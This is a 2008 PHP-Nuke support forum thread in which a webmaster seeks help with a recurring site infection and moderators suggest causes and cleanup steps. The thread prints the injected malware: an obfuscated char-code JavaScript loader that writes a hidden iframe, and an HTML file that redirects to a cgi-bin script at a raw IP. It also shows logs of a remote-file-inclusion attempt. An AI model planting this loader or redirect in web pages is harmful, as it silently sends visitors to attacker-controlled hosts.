Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
lokasher
New Member
New Member


Joined: Mar 27, 2006
Posts: 17

PostPosted: Sat Nov 01, 2008 6:22 am Reply with quote

hi there,

this script is written in each and every .php and .html file.

Code:


<script>
var temp="",i,c=0,out="";
var if_uniq_var="29102008";
var start_time="31 Oct 2008 19:38:00";
var str="60!105!102!114!97!109!101!32!115!114!99!61!34!105!112!111!100!115!117!120!120!46!104!116!109!108!34!32
!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!60!47!105!102!114!97!109!101!62!";
l=str.length;
while(c<=str.length-1)
{
    while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
    c++;
    out=out+String.fromCharCode(temp);
    temp="";
}
document.write(out);
</script>


and this file ipodsuxx.html with code

Code:


<html>
<head>
<meta http-equiv="refresh" content="1;URL=http://91.203.93.49/cgi-bin/index.cgi?iu1">
</head>
<body>
</body>
</html>


is in every folder no matter how many times i remove and edit files.
i was using phpnuke 8.0 patched but two weeks back downgarded to RN 2.3 though this might solve my problem but this script and file keeps coming back .
can some one help me please how to solve my problem

[Admin: I split the code to avoid scrolling Smile]
 
View user's profile Send private message
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17086

PostPosted: Sat Nov 01, 2008 10:58 am Reply with quote

Looks like you have been hacked and there is a script installed somewhere either on your server or w/i your root folder that is adding the code to your scripts. Hosting with DreamHost by any chance? See Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6793
Location: Ha Noi, Viet Nam

PostPosted: Sat Nov 01, 2008 12:36 pm Reply with quote

I was conversing with a young guy on a forum elsewhere and his host (who will remain nameless Wink ) tried to charge the guy $275 to fix what they said was his problem on a fully managed VPS.
If I said it was the same problem it would give the game away so let me say it was a similar exploit.
 
View user's profile Send private message Send e-mail
lokasher
PostPosted: Sat Nov 01, 2008 2:45 pm Reply with quote

Thanks for the reply,
no its not DreamHost,
i talked with them and they said they will upgrade the server using php 4.2 at the moment i guess.
is there any solution i mean if its installed in my root folder can i delete it?
thanks
 
Raven
PostPosted: Sat Nov 01, 2008 4:15 pm Reply with quote

Whether it's Dreamhost or not the issue is the same. Read that thread mentioned above and try to do what is outlined in it. 4.2 - YIKES! I'd find another host but regardless, if they think upgrading php is the answer then they don't have a clue. Bail while you have a chance Wink
 
Guardian2003
PostPosted: Sat Nov 01, 2008 7:01 pm Reply with quote

I have to agree with Raven and for the same reasons.
If they think upgrading PHP (regardless of the version number) will fix anything that is very, very worrying.
 
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Sun Nov 02, 2008 12:52 am Reply with quote

Your server is compromised. Without knowing how they got in, these hackers are just likely to continue using it to launch further attacks.

Figuring out how they got in would be ideal. You should really start from scratch and get a clean backup loaded.

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
lokasher
PostPosted: Mon Nov 03, 2008 2:10 am Reply with quote

evaders99 wrote:
Your server is compromised. Without knowing how they got in, these hackers are just likely to continue using it to launch further attacks.

Figuring out how they got in would be ideal. You should really start from scratch and get a clean backup loaded.


i did that already 2 times.but no use these files keep coming back.
 
Raven
PostPosted: Mon Nov 03, 2008 3:52 am Reply with quote

Then that means either your backup contains the hacked scripts or the server itself is compromised. You will probably need to get your host involved to check the logs or whatever and help you locate the source and removal of the hack.
 
lokasher
PostPosted: Mon Nov 03, 2008 6:25 am Reply with quote

i installed fresh RN 2.3 , didnt use the backup file
 
Susann
Moderator


Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

PostPosted: Mon Nov 03, 2008 8:28 am Reply with quote

Did you already scanned your system ?
Only registered users can see links on this board! Get registered or login!

or:
Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
Raven
PostPosted: Mon Nov 03, 2008 10:18 am Reply with quote

lokasher wrote:
i installed fresh RN 2.3 , didnt use the backup file


The it's a server issue and your host needs to get involved.
 
lokasher
PostPosted: Mon Nov 03, 2008 3:24 pm Reply with quote

Susann wrote:
Did you already scanned your system ?



yes i did that,
scanned my pc and the backup files didnt find any thing.
then i searched for that script in all files, again all files were clear except the backend.php it contained the script.(maybe thats because the backup was created at the time when i was replacing the files) but im sure i replaced it with all the other files.
anyway today again i deleted all files and folders replaced with new ones.lets see now what happens.
Raven wrote:

The it's a server issue and your host needs to get involved.


this is what they told me

Thank you for using our services!

Please note that most of hackers' attacks are usually done through vulnerabilities of website software which you are using (like forums, blogs, CMS). We cannot keep them secured as we are not the developers of such kind of software. From our side, all server-side software (web services, FTP services, etc..) we are keeping up-to-date and protected. Anyway, it is strongly recommended to review everything that you have in website folder and check web server logs to determine the way you may protect your application against further intrusions. If you have any widely-used software installed, check the vendor site for recent updates or security fixes.

As we are using shared servers, it is not possible to perform server-side check of all the data being hosted. There are too much files and folders are hosted in customers directories, though we are performing the whole system updates and maintenance as frequently as it is needed. Thus all the viruses are uploaded to software or features installed on the server are removing automatically, but we are not responsible for the contents being placed to your domain directory.

The virus could be uploaded on the server when you made any update to your website from the local backup. I would recommend you to download all the site data to your local PC and scan the whole system for viruses including the website files. Then, please, re-upload it on the server.

Please, let us know if there is anything else we can help you with. We are available 24/7.
 
Raven
PostPosted: Mon Nov 03, 2008 3:47 pm Reply with quote

Rolling Eyes - Get a new host - seriously. These guys don't have a clue!

Check your foot1 - foot3 settings in your config table using phpMyAdmin to see if there's code in there that is redirecting to a hacker script.

Check your cgi-bin folder to see if there are scripts that don't belong in there.

This will not be a virus, per se. So scanning your scripts will not (necessarily) detect a "footprint" as virus scanners do. There is a script that is running either within your account files or on the server that has to be adding those files.

Make sure that when you are examining your site using FTP that your FTP client is being invoked with the remote file mask of -a.
 
Susann
PostPosted: Mon Nov 03, 2008 4:19 pm Reply with quote

That sounds like a typical standard answer from a hoster but its true they are not responsible for the content of your domain.

I personally believe one scan isn't enough to be sure a system isn't infected anymore.

Maybe you eliminated it with the new backend.php but I would still check my logs and files. RavenNuke(tm) is very safe. That's all I can tell you because I never had such a problem and I use Nuke and particular RavenNuke(tm) since years.

Btw: The webmaster from a Joomla site with the same issue also did not find anything when he scanned his PC. But like I said above that means nothing.
 
Raven
PostPosted: Mon Nov 03, 2008 6:06 pm Reply with quote

lokasher,

Did you find this file on your system - gz_eolas_fix.js?
 
lokasher
PostPosted: Tue Nov 04, 2008 3:19 am Reply with quote

Raven wrote:
lokasher,

Did you find this file on your system - gz_eolas_fix.js?


Nope this file is nowhere either on my pc or the server.
Footer messages are clean and so is the cgi-bin folder.
Antivirus didnt detected the script in backend.php i found it by the text search in all files.just waiting till tomorrow to see what happens because the virus was coming back after 3 days.
 
lokasher
PostPosted: Thu Nov 06, 2008 1:25 am Reply with quote

so far its ok nothing happened,hope it stays that way.
Thank you guys for your time and replies.
 
Raven
PostPosted: Thu Nov 06, 2008 1:36 am Reply with quote

RavensScripts
 
lokasher
PostPosted: Fri Nov 07, 2008 3:05 pm Reply with quote

im getting daily around 30 to 40 Blocked abuse emails from this link with different ip address any info whats this and how to block it permanently
thanks

Code:


Created By: NukeSentinel(tm) 2.6.01
Date &amp; Time: 2008-11-06 04:58:12 CST GMT -0600
Blocked IP: 118.6.230.117
User ID: Guest (1)
Reason: Abuse-Filter
--------------------
Referer: none
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP Host: Only registered users can see links on this board! Get registered or login!
Script Name: /modules.php
Query String: name=h**p://babycaleb.fortunecity.co.uk/index.htm?
Get String: name=h**p://babycaleb.fortunecity.co.uk/index.htm?
Post String: Not Available
Forwarded For: none
Client IP: none
Remote Address: 118.6.230.117
Remote Port: 2397
Request Method: GET
 
Susann
PostPosted: Fri Nov 07, 2008 6:04 pm Reply with quote

Check this:
Only registered users can see links on this board! Get registered or login!
 
lokasher
PostPosted: Sat Nov 08, 2008 7:42 am Reply with quote

Thanks once again .
 
lokasher
PostPosted: Thu Nov 13, 2008 9:13 am Reply with quote

it started again.

2 days back i found strange file in root dir after deleting that i checked the log and i found this where this file was first called

Code:


85.17.184.28 - - [11/Nov/2008:09:52:45 -0600] "GET /fins.html HTTP/1.1" 301 316 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:46 -0600] "GET /fins.html HTTP/1.1" 404 20840 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:47 -0600] "GET /fins.html HTTP/1.1" 302 20840 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:48 -0600] "GET /fins.html HTTP/1.1" 404 20840 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:48 -0600] "GET /xxxxxxx/fins.html HTTP/1.1" 301 324 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:49 -0600] "GET /xxxxxxx/fins.html HTTP/1.1" 404 15417 "-" "Python-urllib/2.5"

and today again an html file was in each n every folder plus the script was added to php and html extensions file
but this time the script was added only to the files in /admin,/blocks/shortlinks folders
in log
Code:


116.71.63.78 - - [13/Nov/2008:05:39:44 -0600] "GET /iu2.html HTTP/1.0" 200 135 "http://www.xxxxxx.com/" "Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1"

any help on this please
 
evaders99
PostPosted: Thu Nov 13, 2008 11:18 am Reply with quote

Was the server actually cleaned and reformatted? Or the only thing that was done was loading a clean RavenNuke 2.3 files?
 
lokasher
PostPosted: Thu Nov 13, 2008 12:58 pm Reply with quote

evaders99 wrote:
Was the server actually cleaned and reformatted? Or the only thing that was done was loading a clean RavenNuke 2.3 files?


Deleted old files and uploaded the RN 2.3 thats all.
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©